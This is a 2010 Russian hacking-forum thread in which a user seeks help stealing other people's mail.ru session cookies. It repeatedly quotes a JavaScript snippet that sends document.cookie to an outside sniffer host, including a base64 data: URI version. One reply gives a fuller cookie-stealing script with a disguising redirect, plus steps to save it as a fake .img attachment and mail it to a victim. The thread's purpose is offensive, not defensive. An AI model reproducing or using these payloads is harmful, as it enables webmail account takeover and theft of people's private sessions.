Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   куки (https://forum.antichat.xyz/showthread.php?t=185322)

гаррет-тень 09.03.2010 18:06

куки
 
09.03.2010 16:00:49 []
IP: 92.126.**.*** Real IP*: 92.126.**.***, 193.169.***.***

QUERY:


cck_count=0; cck_lasttime=1**8***641***

REFERER: empty
AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20***115 Firefox/3.6 (.NET CLR 3.5.3***9) и где тут куки???

shuba 09.03.2010 18:10

Нету

в куках по крайней мере мыло должно быть видно

root_sashok 09.03.2010 18:14

QUERY, собственно.

гаррет-тень 09.03.2010 18:14

вот именно, я подкидываю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> И ГДЕ МОИ КУКИ????

warlok 09.03.2010 18:15

Цитата:

в куках по крайней мере мыло должно быть видно
ты не прав
повидимому вот это
Код:

cck_count=0; cck_lasttime=1**8***641***

гаррет-тень 09.03.2010 18:18

куки же длинные? по крайней мере те которые я видел

seofilms 09.03.2010 18:22

Цитата:

<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
и что ты планировал тут увидеть ??? у тебя запишется только Ip + в query надпись document.cookies;, тебе надо еще найти xss на сайте...

warlok 09.03.2010 18:23

Цитата:

куки же длинные? по крайней мере те которые я видел
они любыми могут быть, посмотри как например работает функция setcookie() в php

Alk@sh 09.03.2010 18:27

самое главное тебе надо найти xss

гаррет-тень 09.03.2010 18:28

я мейловские куки глянул, они большие, да и видео когда смотрел там большие

гаррет-тень 09.03.2010 18:29

Цитата:

Сообщение от seofilms
и что ты планировал тут увидеть ??? у тебя запишется только Ip + в query надпись document.cookies;, тебе надо еще найти xss на сайте...

я видео смотрел и читал на мейле так ломают?

гаррет-тень 09.03.2010 18:31

точнее так можно)

tracy 09.03.2010 18:37

Ты видимо не правильный запрос вписал

гаррет-тень 09.03.2010 18:47

а как по правильно? открой тайну)

гаррет-тень 09.03.2010 18:50

в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)

warlok 09.03.2010 18:58

Цитата:

в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.

попугай 09.03.2010 20:20

Цитата:

Сообщение от гаррет-тень
вот именно, я подкидываю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> И ГДЕ МОИ КУКИ????


этот файл нужно не подкинуть, а сделать так, чтоб
код

PHP код:

<script>
img = new Image(); img.src "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</
script

чудесным образом был внедрён на сайт mail.ru (если тебя mail.ru интересует)

механизм внедрения такого кода называется "XSS"

Вот когда это условие будет выполнено - приступай к следующему этапу

гаррет-тень 10.03.2010 07:40

то есть сначало нужно найти xss, а потом отправлять) спс)

гаррет-тень 10.03.2010 15:16

и все-таки не догоняю...

гаррет-тень 10.03.2010 15:20

вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться

гаррет-тень 10.03.2010 15:22

вот где брал http://forum.xakep.ru/m_1224792/mpage_28/key_/tm.htm

wkar 10.03.2010 15:22

куки будут вороваться только тогда, когда человек который смотрит страницу залогинен.

гаррет-тень 10.03.2010 15:23

так оно и есть

гаррет-тень 10.03.2010 15:24

я прочитаю, и на своем мыле проверяю. чтобы все понять

гаррет-тень 11.03.2010 07:46

и никто не знает...

Redwood 12.03.2010 07:02

Если бы ты нормально излагал свои мысли, тебе бы помогли. Опиши свои действия по порядку с самого начала, если не хочешь светить ссылку на ресурс.

гаррет-тень 18.03.2010 13:25

Цитата:

Сообщение от Redwood
Если бы ты нормально излагал свои мысли, тебе бы помогли. Опиши свои действия по порядку с самого начала, если не хочешь светить ссылку на ресурс.

Я создаю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> отправляю, захожу за другое мыло, там открываю этот файл, потом обновляю лог сниффа. и мне пришло то что написано в первом посте.

гаррет-тень 28.03.2010 14:31

да че такое теперь Query: empty. Ппц ну что такое кто-нибудь знает?

гаррет-тень 28.03.2010 15:15

да, и картинка не высвечивается((

Red_EYEs 08.04.2010 20:28

Скорее всего это вообще не уязвимость. И ты открыл этот файл вне контекста mail.ru. Об этом говорит и реферер пустой. Остынь. Попробуй рассмотреть сайты попроще.

Ruslan1817 08.04.2010 20:49

Это первое :

<script>
img = new Image(); img.src = "http://тут_ставишь_свое.gif?"+document.cook ie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете заменить на свой
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>


Второе :

создаешь текстовый документ, в нем сохраняешь этот скрипт

третье :

расширение текстового док-та ставишь .img

Все прикрепляешь к письму и отправляешь. В мозилле точно не пашет, в опере хз, раньше работала.... сейчас не знаю. Вообще лучше XSS найди и тогда все будет проще.

А вообще это все давно в инете валяется.

гаррет-тень 27.04.2010 16:13

се равно куки не приходят, ток ip


Время: 11:07